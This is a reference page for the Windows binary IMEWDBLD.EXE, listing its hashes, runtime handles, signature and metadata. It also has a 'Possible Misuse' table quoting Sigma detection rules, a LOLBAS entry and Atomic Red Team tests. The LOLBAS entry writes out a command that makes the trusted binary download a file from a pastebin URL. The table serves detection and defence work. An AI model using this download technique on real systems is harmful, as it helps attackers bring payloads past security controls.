IMEWDBLD.EXE

  • File Path: C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE
  • Description: Microsoft IME Open Extended Dictionary Module

Screenshot

IMEWDBLD.EXE

Hashes

Type Hash
MD5 77CB1EF779047326258ABC9463F8C290
SHA1 B73BB05A66EE61550EFF4F2A975867668BAB9523
SHA256 AD1FE7517FA5FCCE52A0718102C7D2C5197DF992D88D3D0C1545148702E8ED78
SHA384 FF8619BF0014311696E7D72ACCEBD9B81765FD86DD7B09FC3A63EDFC9DB91945B2F507EBC1D6ED25FF77060C86DDD748
SHA512 D9D0850B81DF19652A88E2C727634EF255B46784E2344D93F9A0B85F50FE0428331C44A80378487362C29A4591ECEF7DBC1567D1DC14E2C2E054C13944EDB040
SSDEEP 6144:mgwF4/LltagHDp+rhE7l3XkZKIpeUic+pAhjq+6EhRK36cKd7Gs/UEVTppkX+:5/LGgHwE7lnkUIpeuCAhr6EPPd7Gs/r
IMP 0EA5C5DA099B91F909B6707A1299A607
PESHA1 115B0A8A69F7DC96990BEBC5844FC07D21B55B5D
PE256 6A528E4EE96CA5AF00FC0ABEAAA37326BEC68E493E36A279853C7B04CDB0ED82

Runtime Data

Window Title:

Microsoft IME Open Extended Dictionary Error

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\KernelBase.dll.mui File
(R-D) C:\Windows\System32\en-US\msxml6r.dll.mui File
(R-D) C:\Windows\System32\en-US\netmsg.dll.mui File
(R-D) C:\Windows\SystemResources\imageres.dll.mun File
(RW-) C:\Windows\System32 File
(RW-) C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22000.120_none_9d947278b86cc467 File
\BaseNamedObjects__ComCatalogCache__ Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\2\Windows\Theme1077709572 Section
\Windows\Theme3461253685 Section

Loaded Modules:

Path
C:\WINDOWS\System32\ADVAPI32.dll
C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE
C:\WINDOWS\System32\KERNEL32.DLL
C:\WINDOWS\System32\KERNELBASE.dll
C:\WINDOWS\SYSTEM32\ntdll.dll

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: imewdbld.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.1 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.1
  • Language: Language Neutral
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: Unknown

File Similarity (ssdeep match)

File Score
C:\Windows\system32\IME\shared\IMEWDBLD.EXE 33
C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE 38
C:\Windows\system32\IME\SHARED\IMEWDBLD.EXE 41
C:\Windows\SysWOW64\IME\shared\IMEWDBLD.EXE 36
C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE 41
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 33
C:\windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 27
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 35
C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE 33

Possible Misuse

The following table contains possible examples of IMEWDBLD.EXE being misused. While IMEWDBLD.EXE is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma net_connection_win_imewdbld.yml title: Download a File with IMEWDBLD.exe DRL 1.0
sigma net_connection_win_imewdbld.yml description: Use IMEWDBLD.exe (built-in to windows) to download a file DRL 1.0
sigma net_connection_win_imewdbld.yml Image\|endswith: '\IMEWDBLD.exe' DRL 1.0
LOLBAS IMEWDBLD.yml Name: IMEWDBLD.exe  
LOLBAS IMEWDBLD.yml - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw  
LOLBAS IMEWDBLD.yml Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>  
LOLBAS IMEWDBLD.yml - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe  
atomic-red-team index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1105.md - Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md ## Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. MIT License. © 2018 Red Canary
atomic-red-team T1105.md $imewdbled = $env:SystemRoot + “\System32\IME\SHARED\IMEWDBLD.exe” MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.